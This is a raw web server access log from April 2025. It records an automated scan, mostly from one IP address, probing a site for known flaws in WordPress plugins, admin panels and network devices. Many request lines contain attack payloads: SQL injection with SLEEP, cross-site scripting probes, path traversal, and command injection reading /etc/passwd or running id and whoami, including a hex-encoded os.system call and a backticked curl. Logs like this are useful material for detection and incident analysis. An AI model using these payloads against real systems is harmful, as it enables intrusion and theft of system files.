"Mozilla/5.0 (Debian; Linux x86_64; rv:120.0) Gecko/20100101 Firefox/120.0" 154.84.62.234 - - [24/Apr/2025:04:34:28 -0400] "GET /wp-login.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.6.16" 154.84.62.234 - - [24/Apr/2025:04:34:37 -0400] "GET /index.php/login HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:04:34:50 -0400] "POST /kindeditor/php/demo.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.5 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:04:34:55 -0400] "POST /php/demo.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Knoppix; Linux x86_64; rv:120.0) Gecko/20100101 Firefox/120.0" 154.84.62.234 - - [24/Apr/2025:04:35:15 -0400] "POST /CDGServer3/ClientAjax HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Knoppix; Linux i686; rv:123.0) Gecko/20100101 Firefox/123.0" 154.84.62.234 - - [24/Apr/2025:04:35:16 -0400] "POST /Autodiscover/Autodiscover.xml HTTP/1.1" 200 338 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) LoiLoNote/19.0.0 Version/17.1.2 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:04:35:34 -0400] "POST /artifactory/ui/auth/login?_spring_security_remember_me=false HTTP/1.1" 200 0 "https://mgrokokbet.id/artifactory/webapp/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.21" 154.84.62.234 - - [24/Apr/2025:04:36:26 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Knoppix; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:04:36:49 -0400] "POST /search/ HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.1 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:04:36:50 -0400] "POST /search/ HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.7.25" 154.84.62.234 - - [24/Apr/2025:04:37:58 -0400] "GET /wp-content/plugins/social-warfare/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0" 154.84.62.234 - admin [24/Apr/2025:04:39:06 -0400] "POST /content/2w9rfcDKhKgGbEj3TNcXdTi6W1y HTTP/1.1" 200 0 "https://mgrokokbet.id" "Mozilla/5.0 (CentOS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" 154.84.62.234 - admin [24/Apr/2025:04:39:09 -0400] "POST /content/2w9rfcDKhKgGbEj3TNcXdTi6W1y.af.internalsubmit.json HTTP/1.1" 200 0 "https://mgrokokbet.id" "Mozilla/5.0 (Ubuntu; Linux i686; rv:122.0) Gecko/20100101 Firefox/122.0" 154.84.62.234 - - [24/Apr/2025:04:39:14 -0400] "POST /mdm/client/v1/mdmLogUploader?udid=si%5C..%5C..%5C..%5Cwebapps%5CDesktopCentral%5C_chart&filename=logger.zip HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0.1 Mobile/15E148 Safari/604.1" 154.84.62.234 - - [24/Apr/2025:04:39:15 -0400] "GET /backupsettings.dat HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.1 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:04:39:27 -0400] "POST /api/snapshots HTTP/1.1" 200 0 "https://mgrokokbet.id" "Mozilla/5.0 (X11; Linux x86_64; rv:124.0) Gecko/20100101 Firefox/124.0" 154.84.62.234 - - [24/Apr/2025:04:42:09 -0400] "GET /objects/getImage.php?base64Url=YGlkID4geW9sa3cudHh0YA===&format=png HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.5.23" 154.84.62.234 - - [24/Apr/2025:04:42:13 -0400] "GET /objects/getImageMP4.php?base64Url=YGlkID4geW9sa3cudHh0YA===&format=jpg HTTP/1.1" 200 0 "-" "Mozilla/5.0 \\(Windows NT 10.0\\; Win64\\; x64\\) AppleWebKit/537.36 \\(KHTML, like Gecko\\) Chrome/100.0.4896.60 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:04:42:18 -0400] "GET /objects/getSpiritsFromVideo.php?base64Url=YGlkID4geW9sa3cudHh0YA===&format=jpg HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:04:42:22 -0400] "GET /objects/yolkw.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:04:42:44 -0400] "GET /index.php?route=/ HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0" 154.84.62.234 - - [24/Apr/2025:04:42:50 -0400] "GET /wp-content/plugins/chopslider/get_script/index.php?id=1+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))A) HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Knoppix; Linux x86_64; rv:124.0) Gecko/20100101 Firefox/124.0" 154.84.62.234 - - [24/Apr/2025:04:43:05 -0400] "POST /mailingupgrade.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.5.23" 154.84.62.234 - - [24/Apr/2025:04:46:03 -0400] "POST /service/rapture/session HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0" 154.84.62.234 - - [24/Apr/2025:04:46:10 -0400] "POST /service/rest/beta/repositories/bower/group HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0" 154.84.62.234 - - [24/Apr/2025:04:47:41 -0400] "POST /v2/api/product/manger/getInfo HTTP/1.1" 200 0 "-" "Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:04:49:28 -0400] "POST /ajax/api/content_infraction/getIndexableContent HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0" 154.84.62.234 - - [24/Apr/2025:04:51:05 -0400] "POST /cgi-bin/login.cgi HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Fedora; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:04:53:09 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0" 154.84.62.234 - - [24/Apr/2025:04:54:18 -0400] "GET /?cda'\"</script><script>alert(document.domain)</script>&locale=locale=de-DE HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Knoppix; Linux i686; rv:121.0) Gecko/20100101 Firefox/121.0" 154.84.62.234 - - [24/Apr/2025:04:55:16 -0400] "GET /login.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0" 154.84.62.234 - - [24/Apr/2025:04:55:17 -0400] "GET /login.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.4.15" 154.84.62.234 - - [24/Apr/2025:04:55:29 -0400] "POST /module/ HTTP/1.1" 200 0 "https://mgrokokbet.idadmin/view:modules/load_module:users" "Mozilla/5.0 (CentOS; Linux x86_64; rv:123.0) Gecko/20100101 Firefox/123.0" 154.84.62.234 - - [24/Apr/2025:04:55:29 -0400] "POST /module/ HTTP/1.1" 200 0 "https://mgrokokbet.idadmin/view:modules/load_module:users" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:04:55:29 -0400] "POST /module/ HTTP/1.1" 200 0 "https://mgrokokbet.idadmin/view:modules/load_module:users" "Mozilla/5.0 (SS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:04:56:33 -0400] "GET /public/login.htm?type=probes HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux i686; rv:126.0) Gecko/20100101 Firefox/126.0" 154.84.62.234 - - [24/Apr/2025:04:56:40 -0400] "GET /public/login.htm?type=requests HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Safari/605.1.1" 154.84.62.234 - - [24/Apr/2025:04:56:47 -0400] "GET /public/login.htm?type=treestat HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2.1 Safari/605.1.15" 34.202.88.37 - - [24/Apr/2025:04:56:53 -0400] "GET /?NA HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:04:56:58 -0400] "POST /pandora_console/ajax.php?page=include/ajax/events&perform_event_response=10000000&target=cat+/etc/passwd&response_id=1 HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 11) AppleWebKit/616.16 (KHTML, like Gecko) Version/17.0.90 Safari/616.16" 154.84.62.234 - - [24/Apr/2025:04:57:51 -0400] "POST /context.json HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.6.23" 154.84.62.234 - - [24/Apr/2025:04:59:12 -0400] "POST /console/css/%252e%252e%252fconsole.portal HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (ZZ; Linux i686; rv:122.0) Gecko/20100101 Firefox/122.0" 154.84.62.234 - - [24/Apr/2025:05:00:09 -0400] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.63" 154.84.62.234 - - [24/Apr/2025:05:00:21 -0400] "GET /wp-content/uploads/wp_dndcf7_uploads/wpcf7-files/2w9rffU7uukYIXpql2XmDGdkhPQ.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:05:04:38 -0400] "POST /mifs/.;/services/LogService HTTP/1.1" 403 1242 "https://mgrokokbet.id" "Mozilla/5.0 (Kubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:05:04:38 -0400] "POST /console/images/%252e%252e%252fconsole.portal HTTP/1.1" 200 0 "-" "Mozilla/5.0 (CentOS; Linux i686; rv:122.0) Gecko/20100101 Firefox/122.0" 154.84.62.234 - - [24/Apr/2025:05:05:27 -0400] "GET /webadmin/tools/unixlogin.php?login=admin&password=g%27%2C%27%27%29%3Bimport%20os%3Bos.system%28%276563686f20224d6e6335636d5a5764464e765432464f566a523653556f304d6e6454515556766358637a22207c20626173653634202d64203e202f7573722f6c6f63616c2f6e6574737765657065722f77656261646d696e2f6f7574%27.decode%28%27hex%27%29%29%23&timeout=5 HTTP/1.1" 200 0 "https://mgrokokbet.id/webadmin/admin/service_manager_data.php" "Mozilla/5.0 (Ubuntu; Linux i686; rv:122.0) Gecko/20100101 Firefox/122.0" 154.84.62.234 - - [24/Apr/2025:05:05:36 -0400] "GET /webadmin/out HTTP/1.1" 200 0 "https://mgrokokbet.id/webadmin/admin/service_manager_data.php" "Mozilla/5.0 (Windows NT 10.0; rv:102.0) Gecko/20100101 Firefox/102.0" 154.84.62.234 - - [24/Apr/2025:05:08:47 -0400] "POST /run HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:05:09:05 -0400] "GET /user/login HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Kubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:05:10:52 -0400] "POST /apisix/admin/routes HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.61" 154.84.62.234 - - [24/Apr/2025:05:10:59 -0400] "GET /2w9rfZdr2694Co1S7TRMWJ5LvWO?cmd=id HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:05:12:34 -0400] "POST /fuel/login/ HTTP/1.1" 200 0 "https://mgrokokbet.id" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.4.15" 154.84.62.234 - - [24/Apr/2025:05:12:34 -0400] "GET /fuel/pages/items/?search_term&published&layout&limit=50&view_type=list&offset=0&order=asc&col=location+AND+(SELECT+1340+FROM+(SELECT(SLEEP(6)))ULQV)&fuel_inline=0 HTTP/1.1" 200 0 "https://mgrokokbet.id" "Mozilla/5.0 (Debian; Linux i686; rv:128.0) Gecko/20100101 Firefox/128.0" 154.84.62.234 - - [24/Apr/2025:05:12:34 -0400] "GET /fuel/login/ HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:05:13:16 -0400] "GET /api/experimental/test HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Mobile/15E148 Safari/604.1" 154.84.62.234 - - [24/Apr/2025:05:13:22 -0400] "GET /api/experimental/dags/example_trigger_target_dag/paused/false HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.71 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:05:13:28 -0400] "POST /api/experimental/dags/example_trigger_target_dag/dag_runs HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh, Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:05:15:45 -0400] "POST /ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Fedora; Linux x86_64; rv:126.0) Gecko/20100101 Firefox/126.0" 154.84.62.234 - - [24/Apr/2025:05:17:05 -0400] "GET /user/login HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:05:22:55 -0400] "GET /include/exportUser.php?type=3&cla=application&func=_exec&opt=(cat%20/etc/passwd)%3Edtfy.txt HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.32 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:05:23:02 -0400] "GET /include/dtfy.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Kubuntu; Linux x86_64; rv:121.0) Gecko/20100101 Firefox/121.0" 154.84.62.234 - - [24/Apr/2025:05:24:02 -0400] "POST /lib/crud/userprocess.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0" 154.84.62.234 - - [24/Apr/2025:05:24:08 -0400] "GET /login.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:05:24:14 -0400] "POST /lib/crud/userprocess.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Ubuntu; Linux i686; rv:125.0) Gecko/20100101 Firefox/125.0" 154.84.62.234 - - [24/Apr/2025:05:25:43 -0400] "GET /user/login.php HTTP/1.1" 200 0 "xss\"/><img src=\"#\" onerror=\"alert(document.domain)\"/>" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/116.0" 154.84.62.234 - - [24/Apr/2025:05:27:50 -0400] "POST /cgi-bin/login.cgi HTTP/1.1" 200 0 "https://mgrokokbet.id" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:05:27:57 -0400] "POST /cgi-bin/system_log.cgi HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Fedora; Linux i686; rv:123.0) Gecko/20100101 Firefox/123.0" 154.84.62.234 - - [24/Apr/2025:05:28:20 -0400] "GET /global-protect/login.esp HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0 Safari/605.1.65" 154.84.62.234 - - [24/Apr/2025:05:29:31 -0400] "POST /login HTTP/1.1" 403 1242 "mgrokokbet.id/module/login/login.html" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.5.23" 154.84.62.234 - - [24/Apr/2025:05:33:19 -0400] "GET /wp-content/plugins/import-xml-feed/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14.1) AppleWebKit/618.27 (KHTML, like Gecko) Version/17.4 Safari/618.27" 154.84.62.234 - - [24/Apr/2025:05:33:23 -0400] "POST /index.php?option=com_gmapfp&controller=editlieux&tmpl=component&task=upload_image HTTP/1.1" 200 0 "https://mgrokokbet.id" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.1 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:05:33:23 -0400] "POST /index.php?option=comgmapfp&controller=editlieux&tmpl=component&task=upload_image HTTP/1.1" 200 0 "https://mgrokokbet.id" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.124 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:05:34:02 -0400] "GET /fw.login.php?apikey=%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27; HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Fedora; Linux x86_64; rv:122.0) Gecko/20100101 Firefox/122.0" 154.84.62.234 - - [24/Apr/2025:05:34:08 -0400] "GET /cyrus.index.php?service-cmds-peform=%7C%7Cwhoami%7C%7C HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.4 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:05:35:47 -0400] "POST /jars/upload HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.3 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:05:35:51 -0400] "GET /admin/ HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:05:35:58 -0400] "GET /admin/ HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.1 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:05:35:58 -0400] "GET /jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252ftmp%252fpoc HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:05:36:18 -0400] "POST /carbon/generic/save_artifact_ajaxprocessor.jsp HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 11) AppleWebKit/616.16 (KHTML, like Gecko) Version/17.0.90 Safari/616.16" 162.248.72.168 - - [24/Apr/2025:05:36:25 -0400] "GET /about.php?ac=change_about_path&api=&path=&t=650adf113939f450c764fa0c091b7f06&s=1 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:05:36:35 -0400] "POST /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (CentOS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:05:37:35 -0400] "POST /var HTTP/1.1" 200 0 "https://mgrokokbet.id" "Mozilla/5.0 (Knoppix; Linux i686; rv:122.0) Gecko/20100101 Firefox/122.0" 154.84.62.234 - - [24/Apr/2025:05:38:33 -0400] "GET /whoAmI/ HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.2.21" 154.84.62.234 - - [24/Apr/2025:05:38:41 -0400] "GET /whoAmI/ HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 11_3_7; en) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.7 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:05:42:03 -0400] "GET /?p=1 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.61" 154.84.62.234 - - [24/Apr/2025:05:43:36 -0400] "GET /login.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" 108.136.206.220 - - [24/Apr/2025:05:43:50 -0400] "GET /admin/assets/tinymce/filemanager/filemanager/dialog.php HTTP/1.1" 200 0 "-" "Go-http-client/1.1" 154.84.62.234 - - [24/Apr/2025:05:45:39 -0400] "GET /wp-content/plugins/event-espresso-core-reg/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Mobile/15E148 Safari/604.1" 154.84.62.234 - - [24/Apr/2025:05:45:40 -0400] "POST / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.2.23" 154.84.62.234 - - [24/Apr/2025:05:45:48 -0400] "GET /cgi-bin/execute_cmd.cgi?timestamp=1589333279490&cmd=cat%20/etc/passwd HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (CentOS; Linux x86_64; rv:120.0) Gecko/20100101 Firefox/120.0" 154.84.62.234 - - [24/Apr/2025:05:47:09 -0400] "POST / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/117.0" 154.84.62.234 - - [24/Apr/2025:05:47:33 -0400] "GET /index.php?fc=module&module=productcomments&controller=CommentGrade&id_products%5B%5D=(select*from(select(sleep(6)))a) HTTP/1.1" 200 0 "-" "Mozilla/5.0 (CentOS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:05:49:29 -0400] "GET /tiki-login_scr.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:05:49:42 -0400] "GET /tiki-login_scr.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Fedora; Linux i686; rv:127.0) Gecko/20100101 Firefox/127.0" 154.84.62.234 - - [24/Apr/2025:05:49:48 -0400] "POST /api/graphql HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14) AppleWebKit/617.7 (KHTML, like Gecko) Version/17.3.74 Safari/617.7" 154.84.62.234 - - [24/Apr/2025:05:49:49 -0400] "POST / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Ubuntu; Linux i686; rv:125.0) Gecko/20100101 Firefox/125.0" 154.84.62.234 - - [24/Apr/2025:05:49:53 -0400] "GET /tiki-index.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0" 154.84.62.234 - - [24/Apr/2025:05:49:55 -0400] "POST /login.htm HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Ubuntu; Linux i686; rv:123.0) Gecko/20100101 Firefox/123.0" 154.84.62.234 - - [24/Apr/2025:05:50:14 -0400] "POST /cgi-bin/system_mgr.cgi HTTP/1.1" 200 0 "-" "Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:05:50:25 -0400] "POST /cgi-bin/system_mgr.cgi?C1=ON&cmd=cgi_ntp_time&f_ntp_server=`curl HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_3_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:05:50:56 -0400] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Knoppix; Linux i686; rv:128.0) Gecko/20100101 Firefox/128.0" 154.84.62.234 - - [24/Apr/2025:05:51:31 -0400] "GET /setup.cgi?todo=debug&x=currentsetting.htm HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_2_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Safari/605.1.15" 176.97.123.28 - - [24/Apr/2025:05:51:52 -0400] "GET /about.php?ac=change_about_path&api=&path=&t=650adf113939f450c764fa0c091b7f06&s=1 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36" 162.248.72.168 - - [24/Apr/2025:05:53:42 -0400] "GET /640275/about.php?ac=change_about_path&api=&path=&t=650adf113939f450c764fa0c091b7f06&s=1 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:05:53:50 